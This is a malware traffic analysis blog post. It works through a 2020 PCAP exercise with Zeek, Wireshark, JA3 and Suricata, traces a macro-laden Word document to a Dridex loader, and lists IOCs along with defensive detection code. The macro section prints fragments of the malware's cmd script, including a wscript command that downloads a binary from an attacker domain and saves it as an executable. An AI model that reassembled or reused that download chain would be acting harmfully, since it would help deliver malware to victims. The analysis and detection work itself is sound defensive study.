Malware Traffic Analysis
I’ve been meaning to get around to doing one of these in a public blog for a bit, so I figured I would pick one of the more involved examples from Brad’s blog: https://www.malware-traffic-analysis.net/2020/02/21/index.html
Shout out @malwaretraffic
I will not be going through how to use each tool other than some broad recommendations, but it should be a good overview for those new to the practice. Throughout normal analysis you wouldn’t often use multiple tools to accomplish the same thing, but I feel it’s important to get people away from the continued reliance on just using one thing; in this instance, only using Wireshark for PCAPs.
One of the major pitfalls I see with newer analysts, or with people not comfortable venturing down more complete analysis pathways, is the idea that once you have indicators from a given sample or PCAP you can stop. This is bad practice and will often leave you blind to the full scope of a campaign or of the attacker's infrastructure (owned or utilized). As you will see in the OSINT section, I was able to expand the analysis dataset far beyond the indicators tied to the initial binary.
Further note: this doesn't include analysis of samples retrieved from the impacted host; we will only analyze the PCAP and the Word document, stopping at the initial binary that caused the first-stage outbound C2.
This one is going to be thorough, so get ready.
Tools Used (as they appear below): Wireshark, Zeek and trace-summary, fatt (JA3/JA3S), Suricata (ET ruleset alerts), ExifTool, oletools (olevba) and oledump, Censys, Shodan, RIPE/BGP lookups, VirusTotal and any.run.
Analyst Summary
On Friday, 2020-02-21 at 00:55:06 (GMT) the host DESKTOP-5NCFYEU (172.17.8[.]174), with logged-in user ONE-HOT-MESS\gabriella.ventura, downloaded 5c3353be0c746f65ff1bb04bd442a956fb3a2c00 (SHA1; download name yrkbdmt.bin, on disk Caff54e1.exe) via an HTTP request to blueflag[.]xyz (49.51.172[.]56:80). The HTTP request was the result of a malicious macro executing; the macro was in the document inv_261804.doc, SHA1 50ca216f6fa3219927cd1676af716dce6d0c59c2.
Once the stage-1 binary (Caff54e1.exe) executed, there was an outbound TLS connection to 91.211.88[.]122:443 with JA3 fingerprint 51c64c77e60f3980eea90869b68c58a8 and a server certificate with CN/Subject 7Meconepear.Oofwororgupssd[.]tm. The IP address, certificate CN and JA3 are all listed as Dridex-related (see the abuse.ch SSL Blacklist references below).
PCAP Analysis (Wireshark)
Filename: 2020-02-21-traffic-analysis-exercise.pcap
MD5: 5e7bef977e00cee5142667bebe7fa637
SHA1: 8cc4f935383431e4264e482cce03fec0d4b369bd
SHA256: 8b984eca8fb96799a9ad7ec5ee766937e640dc1afcad77101e5aeb0ba6be137d
First packet: 2020-02-20 16:53:50 (Wireshark shows the capture in the analysis host's local time; the Zeek logs below carry UTC epoch seconds, so 1582246506 is 2020-02-21 00:55:06 UTC, the download time given in the summary above)
Last packet: 2020-02-20 17:14:12
Elapsed: 00:20:21
Conversations:
91.211.88[.]122
Censys Certificate: https://censys.io/certificates/22e578e7069ff716c23304bc619376bc24df8f91265d9a10ad7c8d8d19725f6e (Subject: 7Meconepear.Oofwororgupssd[.]tm)
49.51.172[.]56
DNS:
Username: ONE-HOT-MESS\gabriella.ventura
Hostname: DESKTOP-5NCFYEU (172.17.8[.]174)
SMB Objects:
HTTP Objects:
Filename: yrkbdmt.bin
MD5: 64aabb8c0ca6245f28dc0d7936208706
SHA1: 5c3353be0c746f65ff1bb04bd442a956fb3a2c00
SHA256: 03c962ebb541a709b92957e301ea03f1790b6a57d4d0605f618fb0be392c8066
Imphash: b54271bcaf179ca994623a6051fbc2ba
SSDEEP: 6144:vDwYweNHD22Pw2VcYDyw0pkBn88oXhp97:v9LH5YQcYDNakBmhp97
Authentihash: 9a91e94cd20b9c9ff84b2d1f43921d8e2ccb5d794277e7ea74a3c52063b69c4e
PCAP Analysis (Zeek)
There are many more things Zeek is capable of, but for this exercise we will stick with the basics. Running Zeek against the PCAP gives much the same information as the Wireshark pass above, but it is important to know how to get at it with more than one tool.
Trace Summary:
Command: trace-summary 2020-02-21-traffic-analysis-exercise.pcap
Command: zeek -r ../2020-02-21-traffic-analysis-exercise.pcap
conn.log
1582246506.453005 CpfJAf1qEAH2pqe46a 172.17.8.174 49731 49.51.172.56 80 tcp http 2.172008 178 209164 SF - - 0 ShADadfF 60 2590 173 216088 -
dce_rpc.log
1582246432.367241 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000133 49670 netlogon NetrServerReqChallenge
1582246432.367471 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000382 49670 netlogon NetrServerAuthenticate3
1582246432.368397 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000138 49670 netlogon NetrLogonGetCapabilities
1582246432.372826 CCVs2X3Wv2jO2sf2k1 172.17.8.174 49673 172.17.8.8 49670 0.000499 49670 netlogon NetrLogonGetDomainInfo
From these logs we can determine that 172.17.8.8 is the domain controller (it answers the netlogon RPC calls here, and the DNS and Kerberos traffic below) and 172.17.8.174 is the user's workstation.
dhcp.log (nothing of note)
dns.log
1582246506.138612 C6Mhly4WIz8QvLK6Qb 172.17.8.174 62187 172.17.8.8 53 udp 23409 0.308516 blueflag[.]xyz 1 C_INTERNET 1 A 0 NOERROR F F T T 0 49.51.172.56 598.000000 F
The only malicious query in this log is for the blueflag domain; all the others are internal or related to known Microsoft traffic.
files.log
1582246507.033989 Fxn5Bv18iRBhpzhfwb 49.51.172.56 172.17.8.174 CpfJAf1qEAH2pqe46a HTTP 0 PE application/x-dosexec - 1.590656 - F 208896 208896 0 0 F - - - - - - -
http.log
1582246506.703102 CpfJAf1qEAH2pqe46a 172.17.8.174 49731 49.51.172.56 80 1 GET blueflag[.]xyz /nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin - 1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) - 0 208896 200 OK - - (empty) - - - - - - Fxn5Bv18iRBhpzhfwb - application/x-dosexec
kerberos.log
1582246452.084558 Cgr6Sd4lqWwIcT3cOi 172.17.8.174 49706 172.17.8.8 88 AS gabriella.ventura/ONE-HOT-MESS krbtgt/ONE-HOT-MESS F KDC_ERR_PREAUTH_REQUIRED - 2136422885.000000 - T T - - - -
1582246452.096627 CCcaix1sHnsaEYxbCa 172.17.8.174 49707 172.17.8.8 88 AS gabriella.ventura/ONE-HOT-MESS krbtgt/ONE-HOT-MESS.NET T - - 2136422885.000000 aes256-cts-hmac-sha1-96 T T - - - -
1582246452.098261 CCXtOi4Xb0XxMtWMn4 172.17.8.174 49708 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET host/desktop-tzmkhkc.one-hot-mess.com T - - 2136422885.000000 aes256-cts-hmac-sha1-96 T T - - - -
1582246452.170451 CpndUZ3T4klIWP5n5a 172.17.8.174 49709 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET LDAP/One-Hot-Mess-DC.one-hot-mess.com/one-hot-mess.com T - - 2136422885.000000 aes256-cts-hmac-sha1-96 T T - - - -
1582246452.309416 CKu8Rv2Vtlp6vjuyt1 172.17.8.174 49713 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET cifs/One-Hot-Mess-DC T - - 2136422885.000000 aes256-cts-hmac-sha1-96 T T - - - -
1582246452.312945 CCwlke1jlebCOwvDhj 172.17.8.174 49714 172.17.8.8 88 TGS gabriella.ventura/ONE-HOT-MESS.NET krbtgt/ONE-HOT-MESS.NET T - - 2136422885.000000 aes256-cts-hmac-sha1-96 T T - - - -
Note: the first AS-REQ failing with KDC_ERR_PREAUTH_REQUIRED and being retried with pre-authentication is normal Windows logon behaviour, not an attack indicator; the value of this log is that it names the user and the workstation.
ntlm.log
1582246452.212377 ClaKGC4wr7V05UDUJ4 172.17.8.174 49710 172.17.8.8 445 gabriella.ventura DESKTOP-5NCFYEU ONE-HOT-MESS ONE-HOT-MESS-DC One-Hot-Mess-DC.one-hot-mess.com one-hot-mess.com T
packet_filter.log (no filter applied)
pe.log
1582246507.044206 Fxn5Bv18iRBhpzhfwb I386 1582162883.000000 Windows 2000 WINDOWS_CUI T F T T F T T F F T .text,.idata,.data,.idata,.reloc,.rsrc,.reloc
The compile timestamp (1582162883, i.e. 2020-02-20 01:41:23 UTC) is the day before the capture, and the section table lists .idata and .reloc twice, which is not something a stock MSVC build produces; both are worth keeping in mind when the binary itself is examined below.
smb_files.log (nothing of interest outside of DC related files)
smb_mapping.log (nothing of interest outside of DC related files)
ssl.log
1582247508.600095 Ct7Ee81Ox6dlpPr438 172.17.8.174 49760 91.211.88.122 443 TLSv12 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 secp256r1 - F - - T FdN4D73zOqnyNfFnlb (empty) CN=7Meconepear.Oofwororgupssd[.]tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT CN=7Meconepear.Oofwororgupssd.tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT - -
Note that server_name is unset (the client sent no SNI) and that subject and issuer are the same DN, so the server presented a self-signed certificate.
weird.log (nothing of note)
x509.log
1582247508.890169 FdN4D73zOqnyNfFnlb 3 FD0AC1D1629BFE9F CN=7Meconepear.Oofwororgupssd[.]tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT CN=7Meconepear.Oofwororgupssd.tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT 1582211708.000000 1597932908.000000 rsaEncryption sha256WithRSAEncryption rsa 2048 65537 - - - - - T -
The certificate is self-signed (subject == issuer), carries basic_constraints.ca = T, and its validity starts at 1582211708 (2020-02-20 15:15:08 UTC), under ten hours before the session at 1582247508 (2020-02-21 01:11:48 UTC): infrastructure stood up right before use.
JA3
More info on JA3/JA3s here: https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967?gi=c6dd5a5ad356
Command: python3 fatt.py -fp tls -r 2020-02-21-traffic-analysis-exercise.pcap -p | awk '{ print $5 }' | sort -u | grep "ja3=" | rg -oe '[^=]+$'
Result:
28a2c9bd18a11de089ef85a160da29e4 (Microsoft Traffic — non malicious)
37f463bf4616ecd445d4a1937da06e19 (Microsoft Traffic — non malicious)
3b5074b1b5d032e5620f69f9f700ff0e (Microsoft Traffic — non malicious)
9e10692f1b7f78228b2d4e424db3a98c (Microsoft Traffic — non malicious)
a0e9f5d64349fb13191bc781f81f42e1 (Microsoft Traffic — non malicious)
51c64c77e60f3980eea90869b68c58a8 (Malicious)
Context:
172.17.8.174:49760 -> 91.211.88[.]122:443 [TLS] ja3=51c64c77e60f3980eea90869b68c58a8 serverName= (note the empty serverName: no SNI was sent)
Ref: https://sslbl.abuse.ch/ja3-fingerprints/51c64c77e60f3980eea90869b68c58a8/
Caveat: a JA3 hashes only the client's ClientHello parameters, so malware that uses the operating system's TLS stack shares its JA3 with legitimate software on the same Windows build. Treat a JA3 hit as a pivot and confirm it with the destination, the JA3S and the certificate, as done here.
JA3S
Command: python3 fatt.py -fp tls -r 2020-02-21-traffic-analysis-exercise.pcap -p | awk '{ print $5 }' | sort -u | grep "ja3s=" | rg -oe '[^=]+$'
Result (only showing malicious):
e35df3e00ca4ef31d42b34bebaa2f86e
Context:
91.211.88[.]122:443 -> 172.17.8.174:49760 [TLS] ja3s=e35df3e00ca4ef31d42b34bebaa2f86e
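To make the fingerprint concrete, here is an added example (not the write-up's code, nor fatt's or the JA3 project's) that builds a synthetic ClientHello from assumed parameters and computes its JA3 string and MD5 the way fatt does: TLS version, cipher suites, extension types, supported groups and EC point formats, decimal, joined with dashes and commas, with GREASE values dropped. The parameters, the hostname example.test and the resulting hash are illustrative and are not the 51c64c... fingerprint from the capture.

```python
"""JA3 from a raw TLS ClientHello (added example; not the write-up's code and not
fatt's or the JA3 project's).  build_client_hello() makes a synthetic ClientHello
from assumed parameters so the example runs offline; ja3() parses any ClientHello
record and returns the JA3 string and MD5 in the form fatt reports them above."""
import hashlib
import struct

# GREASE values (0x0a0a, 0x1a1a, ... 0xfafa) are randomised per connection and are
# excluded from the fingerprint, otherwise the hash would change from session to session.
GREASE = {(n << 12) | 0x0A00 | (n << 4) | 0x0A for n in range(16)}

def build_client_hello(version=0x0303, ciphers=(), groups=(), point_formats=(0,),
                       sni=None, extra_ext_types=()):
    """Serialise a TLS record carrying a ClientHello with the given parameters."""
    exts = b""
    if sni:                                   # server_name (extension type 0)
        name = sni.encode()
        entry = struct.pack("!BH", 0, len(name)) + name
        exts += struct.pack("!HHH", 0x0000, len(entry) + 2, len(entry)) + entry
    grp = b"".join(struct.pack("!H", g) for g in groups)      # supported_groups (10)
    exts += struct.pack("!HHH", 0x000A, len(grp) + 2, len(grp)) + grp
    pf = bytes(point_formats)                                   # ec_point_formats (11)
    exts += struct.pack("!HHB", 0x000B, len(pf) + 1, len(pf)) + pf
    for t in extra_ext_types:                 # empty extensions; only their type matters here
        exts += struct.pack("!HH", t, 0)
    body = (struct.pack("!H", version) + b"\x00" * 32 + b"\x00"       # random, empty session id
            + struct.pack("!H", 2 * len(ciphers))
            + b"".join(struct.pack("!H", c) for c in ciphers)
            + b"\x01\x00"                                               # one compression method: null
            + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake

def ja3(record):
    """Return (ja3_string, ja3_md5) for a TLS record holding a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    p = 9                                     # 5-byte record header + 4-byte handshake header
    version = struct.unpack_from("!H", record, p)[0]
    p += 2 + 32                               # client_version, random
    p += 1 + record[p]                        # session id
    n = struct.unpack_from("!H", record, p)[0]
    p += 2
    ciphers = [c for c in struct.unpack_from("!%dH" % (n // 2), record, p) if c not in GREASE]
    p += n
    p += 1 + record[p]                        # compression methods
    ext_types, groups, formats = [], [], []
    if p < len(record):                       # the extensions block is optional
        end = p + 2 + struct.unpack_from("!H", record, p)[0]
        p += 2
        while p < end:
            t, ln = struct.unpack_from("!HH", record, p)
            data = record[p + 4:p + 4 + ln]
            p += 4 + ln
            if t in GREASE:
                continue
            ext_types.append(t)
            if t == 0x000A:
                cnt = struct.unpack_from("!H", data, 0)[0] // 2
                groups = [g for g in struct.unpack_from("!%dH" % cnt, data, 2) if g not in GREASE]
            elif t == 0x000B:
                formats = list(data[1:1 + data[0]])
    parts = ([version], ciphers, ext_types, groups, formats)
    s = ",".join("-".join(str(v) for v in part) for part in parts)
    return s, hashlib.md5(s.encode()).hexdigest()

if __name__ == "__main__":
    hello = build_client_hello(ciphers=(0x1A1A, 0xC02C, 0xC02B), groups=(0x2A2A, 0x001D, 0x0017),
                               sni="example.test", extra_ext_types=(0x0017, 0xFAFA))
    print(*ja3(hello))
```

ja3() works on any raw ClientHello record, for instance the first TLS record of the client-to-server stream pulled out with tshark or scapy; JA3S is built the same way from the ServerHello (version, chosen cipher, extension types), which is why the server side of the session above gets its own hash.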
Suricata Alerts
*Note* you can always replay a PCAP through Suricata offline (suricata -r <pcap>) to see what alerts would trigger, but Brad was nice enough to share them in an archive.
Based on what Brad shared from the network capture, here are the relevant alerts that triggered and what they mean:
ET POLICY Binary Download Smaller than 1 MB Likely Hostile
49.51.172[.]56 -> 172.17.8.174 (Binary download with size less than 1 MB)
ET POLICY PE EXE or DLL Windows file download HTTP (Binary Download, defined by Header)
49.51.172[.]56 -> 172.17.8.174
ET CURRENT_EVENTS WinHttpRequest Downloading EXE (HTTP request using the WinHttpRequest User-Agent-String)
49.51.172[.]56 -> 172.17.8.174
ET CURRENT_EVENTS Likely Evil EXE download from WinHttpRequest non-exe extension (HTTP request using the WinHttpRequest User-Agent string; the requested file doesn't have an .exe extension)
49.51.172[.]56 -> 172.17.8.174
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) (malicious SSL certificate observed in the context of session; based on the SHA1 of the certificate within the context of this listing: https://sslbl.abuse.ch/blacklist/sslblacklist.csv)
91.211.88[.]122 -> 172.17.8.174
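The Suricata signatures above encode the same observations the Zeek http, ssl and x509 logs make explicit: a PE body fetched by the WinHttpRequest default User-Agent under a non-.exe name, and a TLS session to a freshly minted self-signed certificate with no SNI. As an added example (not the write-up's code, nor Zeek's or Suricata's), here is that logic as a script over Zeek TSV logs. The log text is constructed: one row of each log is re-typed from the Zeek lines shown above under the standard Zeek 3.x field headers (the page shows data rows only, so the header lines are an assumption), and the 203.0.113.x rows are made-up benign traffic used as negative controls.

```python
"""Detection logic over Zeek http/ssl/x509 records (added example; not code from the
write-up, Zeek or Suricata).  The logs are constructed: the first data row of each is
re-typed from the Zeek lines shown above as tab-separated records under the standard
Zeek 3.x #fields headers (the headers are an assumption), and the 203.0.113.x rows are
made-up benign traffic.  Names are un-defanged because that is what Zeek writes."""
import re

def tsv(*fields):
    return "\t".join(fields)

DRIDEX_DN = "CN=7Meconepear.Oofwororgupssd.tm,O=Fovemaud Ptesiswss Ultd.,L=Vienna,ST=Anofotr,C=AT"
CA_DN = "CN=Example CA,O=Example"            # constructed issuer for the benign rows

HTTP_LOG = "\n".join([
    tsv("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "trans_depth",
        "method", "host", "uri", "referrer", "version", "user_agent", "origin", "request_body_len",
        "response_body_len", "status_code", "status_msg", "info_code", "info_msg", "tags", "username",
        "password", "proxied", "orig_fuids", "orig_filenames", "orig_mime_types", "resp_fuids",
        "resp_filenames", "resp_mime_types"),
    tsv("1582246506.703102", "CpfJAf1qEAH2pqe46a", "172.17.8.174", "49731", "49.51.172.56", "80", "1",
        "GET", "blueflag.xyz", "/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin", "-", "1.1",
        "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)", "-", "0", "208896", "200", "OK",
        "-", "-", "(empty)", "-", "-", "-", "-", "-", "-", "Fxn5Bv18iRBhpzhfwb", "-", "application/x-dosexec"),
    tsv("1582246400.000000", "CbenignHttp1", "172.17.8.174", "49700", "203.0.113.10", "80", "1",
        "GET", "dl.example.test", "/setup.exe", "-", "1.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "-", "0", "4096", "200", "OK", "-", "-", "(empty)", "-", "-", "-", "-", "-", "-",
        "FbenignHttp1", "-", "application/x-dosexec"),
])

SSL_LOG = "\n".join([
    tsv("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "version", "cipher",
        "curve", "server_name", "resumed", "last_alert", "next_protocol", "established",
        "cert_chain_fuids", "client_cert_chain_fuids", "subject", "issuer", "client_subject", "client_issuer"),
    tsv("1582247508.600095", "Ct7Ee81Ox6dlpPr438", "172.17.8.174", "49760", "91.211.88.122", "443", "TLSv12",
        "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "secp256r1", "-", "F", "-", "-", "T",
        "FdN4D73zOqnyNfFnlb", "(empty)", DRIDEX_DN, DRIDEX_DN, "-", "-"),
    tsv("1582246600.000000", "CbenignTls1", "172.17.8.174", "49740", "203.0.113.20", "443", "TLSv12",
        "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "secp256r1", "www.example.test", "F", "-", "-", "T",
        "FbenignTls1", "(empty)", "CN=www.example.test", CA_DN, "-", "-"),
])

X509_LOG = "\n".join([
    tsv("#fields", "ts", "id", "certificate.version", "certificate.serial", "certificate.subject",
        "certificate.issuer", "certificate.not_valid_before", "certificate.not_valid_after",
        "certificate.key_alg", "certificate.sig_alg", "certificate.key_type", "certificate.key_length",
        "certificate.exponent", "certificate.curve", "san.dns", "san.uri", "san.email", "san.ip",
        "basic_constraints.ca", "basic_constraints.path_len"),
    tsv("1582247508.890169", "FdN4D73zOqnyNfFnlb", "3", "FD0AC1D1629BFE9F", DRIDEX_DN, DRIDEX_DN,
        "1582211708.000000", "1597932908.000000", "rsaEncryption", "sha256WithRSAEncryption", "rsa",
        "2048", "65537", "-", "-", "-", "-", "-", "T", "-"),
    tsv("1582246600.100000", "FbenignTls1", "3", "01", "CN=www.example.test", CA_DN, "1570000000.000000",
        "1600000000.000000", "rsaEncryption", "sha256WithRSAEncryption", "rsa", "2048", "65537", "-",
        "www.example.test", "-", "-", "-", "F", "-"),
])

def parse_zeek(text):
    """Parse Zeek's default TSV writer output into dicts; '-' is unset, '(empty)' an empty set."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            vals = [None if v == "-" else "" if v == "(empty)" else v for v in line.split("\t")]
            rows.append(dict(zip(fields, vals)))
    return rows

WINHTTP_UA = re.compile(r"WinHttp\.WinHttpRequest", re.I)

def suspicious_downloads(http_rows):
    """Same idea as the ET 'WinHttpRequest Downloading EXE' / 'non-exe extension' signatures:
    a PE body fetched with the WinHttpRequest default User-Agent, worse if the URI hides it."""
    hits = []
    for r in http_rows:
        if r["resp_mime_types"] != "application/x-dosexec" or not WINHTTP_UA.search(r["user_agent"] or ""):
            continue
        uri = r["uri"] or ""
        ext = uri.lower().rsplit(".", 1)[-1] if "." in uri else ""
        hits.append({"uid": r["uid"], "url": f"{r['host']}{uri}", "bytes": int(r["response_body_len"]),
                     "reason": "WinHttpRequest PE download" + ("" if ext in ("exe", "dll") else " with non-exe extension")})
    return hits

def suspicious_tls(ssl_rows, x509_rows, fresh_hours=24):
    """Flag a session when at least two of: no SNI; self-signed server cert (subject == issuer);
    cert minted less than fresh_hours before the session.  The Dridex C2 above shows all three."""
    certs = {c["id"]: c for c in x509_rows}
    hits = []
    for s in ssl_rows:
        if s["established"] != "T":
            continue
        reasons = ["no SNI"] if s["server_name"] is None else []
        for cert in filter(None, (certs.get(f) for f in (s["cert_chain_fuids"] or "").split(","))):
            if cert["certificate.subject"] == cert["certificate.issuer"]:
                reasons.append("self-signed")
            age_h = (float(s["ts"]) - float(cert["certificate.not_valid_before"])) / 3600
            if 0 <= age_h < fresh_hours:
                reasons.append(f"cert issued {age_h:.1f}h before session")
        if len(reasons) >= 2:
            hits.append({"uid": s["uid"], "server": f"{s['id.resp_h']}:{s['id.resp_p']}",
                         "subject": s["subject"], "reasons": reasons})
    return hits
```

Calling suspicious_downloads(parse_zeek(HTTP_LOG)) and suspicious_tls(parse_zeek(SSL_LOG), parse_zeek(X509_LOG)) returns the two findings for this capture and nothing for the benign rows; point parse_zeek() at the real http.log, ssl.log and x509.log written by zeek -r and the same functions run unchanged. The freshness window and the two-reasons threshold are tunable knobs rather than Dridex-specific constants.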
Sample Analysis (Word Doc)
Filename: inv_261804.doc
MD5: 487ea5406a04bc22a793142b5ab87de6
SHA1: 50ca216f6fa3219927cd1676af716dce6d0c59c2
SHA256: 01ea3845eac489a2518962e6a9f968cde0811e1531f5a58718fb02cf62541edc
Dynamic Execution Reports:
Relevant ExifTool output (note the extension mismatch: despite the .doc name the file is an OOXML macro-enabled document, DOCM, which Word opens regardless of the extension; App Version 12.0000 corresponds to Word 2007, and the Russian heading label suggests a Russian-locale Office install saved it):
File Type: DOCM
File Type Extension: docm
MIME Type: application/vnd.ms-word.document.macroEnabled
Total Edit Time: 0
Pages: 2
Words: 2
Characters: 18
Application: Microsoft Office Word
Doc Security: Password protected
Lines: 1
Paragraphs: 1
Scale Crop: No
Heading Pairs: Title, 1, Название, 1 (Название == Title)
Titles Of Parts: ,
Characters With Spaces: 19
App Version: 12.0000
Creator:
Last Modified By:
Revision Number: 1
----------------------------------------
VBA Bin
Filename: vbaProject.bin
MD5: efdd4e5cb3e60824c9109b2ccbafed58
SHA1: ebaab69446fbf4dcf7efbd232048eac53d3f09fb
SHA256: a03ea3f665e90ad0e17f651c86f122e6b6c9959ef5c82139720ebb433fc00993
SSDEEP: 1536:LDL4uQGjj6u2o6jqZeZtPanlEnULSMcehZ0N1QG7MvEN5tUnYLNH1zN6sffvfN0Q:j0G6u2oAqsP8inULtcehZ0N1QG7MvENg
Embedded Image
Filename: image1.png
MD5: f4ba1757dcca0a28b2617a17134d3f31
SHA1: 45853a83676b5b0b1a1a28cd60243a3ecf2f2e7a
SHA256: f73ebad98d0b1924078a8ddbde91de0cf47ae5d598d0aeb969e145bd472e4757
Command: olevba -a inv_261804.doc
Non-empty macros:
OLE stream: ‘VBA/traditional_food’
OLE stream: ‘VBA/Modules’
OLE stream: ‘VBA/Variable’
----------------------------------------
Command: python3 oledump.py inv_261804.doc
----------------------------------------
Using either olevba or oledump, dump the streams oledump marks with M (macro code): 17, 19, 26.
Example command:
python3 oledump.py -s 26 -v inv_261804.doc > stream_26.vba
Streams
Stream 17
Stream 19
The real meat of what the macros do is in stream 26 ("traditional_food"), but since it is rather large (348 lines), I am going to highlight sections of interest...
Stream 26
The many (seemingly repetitive) lines in the overview above build string buffers that are then written out as commands. Iterating over string buffers like this is a rather clumsy way to do it, and one of two things is true: 1. they are attempting to bypass mitigating controls (e.g. AV); 2. they are horrible at writing macros. Or, ya know, both.
VBA7 Check
The first thing we see is conditional function declarations dependent on the version of VBA in use on the target system:
VBA7 was introduced with Office 2010 to support 64-bit Office (link). The declarations differ accordingly: when VBA7 is detected, the Declare statements use the PtrSafe keyword and LongPtr for pointer-sized values, instead of the older style that declares them as a plain Long.
Hidden Window
The Private Const declarations show the developer wants the spawned window hidden during macro execution: SW_HIDE is declared with the value 0, the ShowWindow constant that hides a window. More info on these declarations here.
Directory/File Creation
The output of the macro seen in stream 26 generates 4 cmd files:
bufferForCmd4 = “C:\DecemberLogs\Restaraunt4.cmd”
bufferForCmd1 = “C:\DecemberLogs\Restaraunt1.cmd”
bufferForCmd2 = “C:\DecemberLogs\Restaraunt2.cmd”
bufferForCmd3 = “C:\DecemberLogs\Restaraunt3.cmd”
Note: you may have noticed the developer spelled "Restaraunt" incorrectly; this is a good string pivot for static hunting (wink).
Restaraunt2.cmd is the most active of the four; here are the relevant things it does:
Set MyVarname1 = Wscript.Arguments >> %namerestaraunt%
set namerestaraunt=C:\DecemberLogs\OliviaMatter.vbs
CreateObject(“WinHttp.WinHttpRequest.5.1”)
“GET”
CreateObject(“ADODB.Stream”)
CreateObject(“Scripting.FileSystemObject”)
wscript //nologo c:\DecemberLogs\OliviaMatter.vbs hxxp://blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin C:\DecemberLogs\Caff54e1.exe
- the downloaded file (yrkbdmt.bin) is named as Caff54e1.exe on disk
The filler text in this cmd file is lifted from this site: hxxps://www.purpletables[.]com/for-restaurants
Sample Analysis (EXE)
Filename: Caff54e1.exe
Family: Dridex (Loader)
ITW Host URL(s):
* hxxp://shameonyou[.]xyz/wBNPADvPLRDHrvqjFnEV/hjjalma.bin
* hxxp://blueflag[.]xyz/nCvQOQHCBjZFfiJvyVGA/yrkbdmt.bin
Compile Time: 2020–02–20 01:41:23
Compiler: Microsoft Visual C/C++(2010 SP1)[-]
Linker Version: 12.0 (Visual Studio 2013)
Type/Magic: PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:64aabb8c0ca6245f28dc0d7936208706
SHA-1:5c3353be0c746f65ff1bb04bd442a956fb3a2c00
SHA-256: 03c962ebb541a709b92957e301ea03f1790b6a57d4d0605f618fb0be392c8066
SSDEEP: 6144:vDwYweNHD22Pw2VcYDyw0pkBn88oXhp97:v9LH5YQcYDNakBmhp97
LegalCopyright: Copyright © 1990–2018 Citrix Systems, Inc.
InternalName: VDIME
FileVersion: 14.12.0.18020
CompanyName: Citrix Systems, Inc.
ProductName: Citrix Receiver
ProductVersion: 14.12.0
FileDescription: Citrix Receiver VDIME Resource DLL (Win32)
OriginalFilename: VDIME.DLL
More info about the legit dll being impersonated: https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/configure-xenapp.html
Resources:
Related Samples by Resource Hash (SHA1):
VT Search
resource:"dfa16393a68aeca1ca60159a8cd4d01a92bfffbe260818f76b81b69423cde80c"
0585cabaf327a8d2c41bfb4882b8f0cd550883cd
d0d571ed6b3780a399caacc88d764ee63426e788
d5f5508d82719d4b290b99adab72dd26af7c31fe
37fe041467a245cdaf50ff2deb617c5097ab30b2
b5e97e1c8fca92aceb4f27b69d0252b5ffc25c03
2644dd2af154160f6ac1045e2d13c364e879a8f0
5b4cb9dcbf7b176e226c2f46a2970017d2fe2fab
d0bbd4c5ac4d368026160419e95f381f72a1b739
Behavioral Report: https://app.any.run/tasks/e35311cc-7cb0-4030-be20-9811c6bf3d9a/
Outbound Indicators:
91.211.88[.]122:443
107.161.30[.]122:8443
188.166.25[.]84:3886
87.106.7[.]163:3886
Related Tweet:
OSINT fun
91.211.88[.]122
BGP Info
RIPE Info:
If you look specifically at the ASN description, it points to hostfory:
Certificate History
Shodan History
It's always important to check multiple services (e.g. Censys, Shodan, BinaryEdge) to figure out when a host first came online and, more importantly, when it was first seen in the context you observed during analysis. For this exercise, we saw the 91.* address serving on port 443, and the certificate and scan timestamps closely align with the traffic we observed in the PCAP.
blueflag[.]xyz
49[.]51.172.56
Domains
asmarlife[.]com
lndeed[.]press
secure[.]lndeed[.]tech
root[.]lndeed[.]press
lndeed[.]tech
secure[.]lndeed[.]press
lsarta[.]ca
emplois[.]lsarta[.]ca
*[.]lsarta[.]ca
shameonyou[.]xyz
blueflag[.]xyz
www[.]shameonyou[.]xyz
warmsun[.]xyz
mineminecraft[.]xyz
smokesome[.]xyz
deeppool[.]xyz
www[.]asmarlife[.]com
BGP Info
Shodan Host information
Related Packet Captures
Actionable IOCs
Hashes (SHA1)
ebaab69446fbf4dcf7efbd232048eac53d3f09fb (vbaProject.bin)
5c3353be0c746f65ff1bb04bd442a956fb3a2c00 (Caff54e1.exe)
45853a83676b5b0b1a1a28cd60243a3ecf2f2e7a (embedded PNG)
JA3 Fingerprints (w/ IP) - malicious
51c64c77e60f3980eea90869b68c58a8 (91.211.88[.]122:443)
JA3s Fingerprints - malicious
e35df3e00ca4ef31d42b34bebaa2f86e (91.211.88[.]122:443)
Domains
blueflag[.]xyz
